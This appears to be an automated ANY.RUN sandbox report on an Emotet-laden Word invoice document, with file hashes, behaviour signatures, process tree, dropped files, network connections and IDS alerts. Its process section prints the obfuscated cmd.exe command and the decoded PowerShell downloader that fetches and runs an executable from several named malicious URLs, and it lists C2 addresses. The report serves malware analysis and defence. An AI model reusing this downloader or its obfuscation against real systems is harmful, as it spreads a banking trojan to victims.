analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Inv_121820186H9297106.doc

Full analysis: https://app.any.run/tasks/c220d1a8-f207-43d8-8848-13086f5c2262
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 14:29:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 13:25:00 2018, Last Saved Time/Date: Tue Dec 18 13:25:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 15, Security: 0
MD5:

B781972232A1A2FD71527FB3A333AC4F

SHA1:

7B1A257C90814F0F8C95AE35C2CEC1E35401F914

SHA256:

FF3B1761553743B262A9FC9B7678B79CC22C6FFFCD6D1AB880079CB0E7F02F86

SSDEEP:

1536:pq81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadwT4/3/g+a9:pq8GhDS0o9zTGOZD6EbzCdz/3/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3384)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3384)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3028)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3148)
    • Application was dropped or rewritten from another process

      • 150.exe (PID: 3904)
      • 150.exe (PID: 2732)
      • archivesymbol.exe (PID: 3644)
      • archivesymbol.exe (PID: 2828)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3148)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3644)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3644)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3644)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2436)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3148)
      • 150.exe (PID: 3904)
    • Creates files in the user directory

      • powershell.exe (PID: 3148)
    • Starts itself from another location

      • 150.exe (PID: 3904)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3644)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3384)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3384)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 13:25:00
ModifyDate: 2018:12:18 13:25:00
Pages: 1
Words: 2
Characters: 15
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 16
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 150.exe no specs 150.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3384"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Inv_121820186H9297106.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2436c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3028CmD /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3148powershell $KSv='DfV';$ohl=new-object Net.WebClient;$lIY='http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@');$svv='mba';$iro = '150';$FBp='Wjn';$kjh=$env:temp+'\'+$iro+'.exe';foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='ORc';If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='iGG';break;}}catch{}}$HTB='tWJ';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2732"C:\Users\admin\AppData\Local\Temp\150.exe" C:\Users\admin\AppData\Local\Temp\150.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3904"C:\Users\admin\AppData\Local\Temp\150.exe"C:\Users\admin\AppData\Local\Temp\150.exe
150.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2828"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe150.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3644"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 836
Read events
1 343
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
3384WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8860.tmp.cvr
MD5:
SHA256:
3384WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F255354E.wmf
MD5:
SHA256:
3384WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44919E8C.wmf
MD5:
SHA256:
3148powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KXEPEB3NJMU5YGBAWNKR.temp
MD5:
SHA256:
3384WINWORD.EXEC:\Users\admin\Desktop\~$v_121820186H9297106.docpgc
MD5:727B8D8C5A3C8B4487991FC8FE33E77A
SHA256:78FE7D2E5B57CAE418D14F27A6AA4513A0BE2D00679BF5EC4F566200F6096281
3384WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\762EC8F7.wmfwmf
MD5:F67A53B62E4F1C4F6EFC31CEAE12DFDE
SHA256:324EB974C805E6A9DFCAA7052408A2F38A4D84286E598D7F3216DEB9E0DD101A
3148powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a04d.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3384WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:BEADCBC43BCA682426C23A5E72612297
SHA256:C0AB580AAA8C4BAAF9EC91D5B1B8C51868D15A7201A4151B02C0EE6D5A2BFB7B
3148powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3384WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:0DBE4A00B48E90419F5A5E3D3DE80D52
SHA256:F7F10CFF1B4606F10E81C958D1DD719B010FEEEBF511E09D0D8B2E50375AD12C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
7
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3644
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
3148
powershell.exe
GET
301
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd
DE
html
244 b
malicious
3644
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
3148
powershell.exe
GET
200
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd/
DE
executable
124 Kb
malicious
GET
200
201.190.150.60:443
http://201.190.150.60:443/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3148
powershell.exe
144.76.122.10:80
www.ideenweberei.com
Hetzner Online GmbH
DE
suspicious
3644
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
3644
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
3644
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious
3644
archivesymbol.exe
81.150.17.158:8443
British Telecommunications PLC
GB
malicious
3644
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious
3644
archivesymbol.exe
201.190.150.60:443
ARLINK S.A.
AR
malicious

DNS requests

Domain
IP
Reputation
www.ideenweberei.com
  • 144.76.122.10
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3148
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3148
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3148
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3148
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3148
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3644
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3644
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3644
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3644
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3644
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3 ETPRO signatures available at the full report
No debug info